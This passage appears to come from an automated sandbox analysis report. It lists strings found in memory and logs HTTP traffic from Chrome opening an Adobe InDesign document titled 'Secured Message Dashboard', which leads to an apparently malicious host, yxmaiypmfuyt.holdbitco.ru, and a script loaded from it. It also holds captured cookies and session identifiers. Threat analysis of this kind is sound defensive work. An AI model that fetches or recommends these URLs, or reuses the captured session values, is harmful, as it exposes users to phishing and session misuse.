Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_125.4.drString found in binary or memory: https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://webshell.suite.office.com
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://wus2.contentsync.
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: chromecache_114.4.drString found in binary or memory: https://www.internalfb.com/intern/invariant/
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://www.yammer.com
Source: chromecache_109.4.drString found in binary or memory: https://yxmaiypmfuyt.holdbitco.ru/myscr229838.js
Source: chromecache_151.4.drString found in binary or memory: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2023-10-06-09; NID=511=LtGInZ4I4WDrCvCHQBVMHOy4a-sqzpSrMO-Rwr8ezStTz_kfoi2bri7uGdXfNvskAEO_Tj5Jkwl0XSN-qA6MYiGShcDB_vNQOl1bpl3aua7gMrDRvWsHLpAuFBlBnNxTMeen95XElzx3r4myG8p8sgSHdx4NBawYGaI5oFn_dZ8
Source: unknownDNS traffic detected: queries for: clients2.google.com
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /utilnav/9.1/utilitynav.css HTTP/1.1Host: prod.adobeccstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S4ayF1XodpULRLK&MD=x2yT1Dku HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /en_US/sdk.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://indd.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en_US/sdk.js?hash=3740de9a4f4c75e0f8a8b2570a1a8fbc HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://indd.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52294029732250?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A18%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sat_domain=A; s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52294029732250?AQB=1&pccr=true&vidn=329CA0F3A19B75CA-60000BAF437DAE53&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A18%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sat_domain=A; s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52294029732250?AQB=1&pccr=true&vidn=329CA0F3A19B75CA-60000BAF437DAE53&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A18%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s55507997216608?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AFirstPageLoaded&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s54551911915086?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3APageLoaded&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s55507997216608?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AFirstPageLoaded&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52012643213516?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AIFrameSrcURLs&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s54551911915086?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3APageLoaded&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s57943804281193?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AInsertHTMLSnippetsWithoutIFrame&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52012643213516?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AIFrameSrcURLs&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s57943804281193?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AInsertHTMLSnippetsWithoutIFrame&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1Host: sstats.adobe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]
Source: global trafficHTTP traffic detected: GET /ynabwktmc HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /myscr229838.js HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
